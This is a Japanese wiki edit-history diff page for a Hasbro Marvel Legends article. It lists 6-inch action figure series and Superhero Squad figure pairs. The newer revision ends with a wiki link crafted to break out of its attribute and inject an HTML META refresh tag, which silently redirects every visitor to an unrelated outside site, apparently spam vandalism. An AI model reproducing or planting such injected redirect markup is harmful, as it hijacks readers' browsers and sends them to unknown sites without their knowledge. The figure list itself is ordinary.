「Hasbro MARVEL LEGENDS」の編集履歴(バックアップ)一覧はこちら

Hasbro MARVEL LEGENDS - (2006/07/27 (木) 18:31:51) の最新版との変更点



#contents 6 inch action figure series **Series 1(Annihilus Series?) Ultimate Iron Man Emma Frost Movie Beast (X-3) Hercules Banshee Planet Hulk **Series 2(Blob Series?) Hasbro - Xorn Lord Asgard Thor X3 - Jean Grey First Appearance Storm Quick Silver Yellow Jacket She-Hulk Ultimate Wolverine Thor (with beard and armor) **Superhero Squad Series 1 Punisher and Ghostrider Cyclops and Magneto Colossus and Angel Captain America and Hawkeye Hulk and Wasp DareDevil and Electra Iron Man and Thor Wolverine and Sabertooth
#contents 6 inch action figure series **Series 1(Annihilus Series?) Ultimate Iron Man Emma Frost Movie Beast (X-3) Hercules Banshee Planet Hulk **Series 2(Blob Series?) Hasbro - Xorn Lord Asgard Thor X3 - Jean Grey First Appearance Storm Quick Silver Yellow Jacket She-Hulk Ultimate Wolverine Thor (with beard and armor) **Superhero Squad Series 1 Punisher and Ghostrider Cyclops and Magneto Colossus and Angel Captain America and Hawkeye Hulk and Wasp DareDevil and Electra Iron Man and Thor Wolverine and Sabertooth [[@wikiへ>http://kam.jp"><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://esthe.pink.sh/r/]]

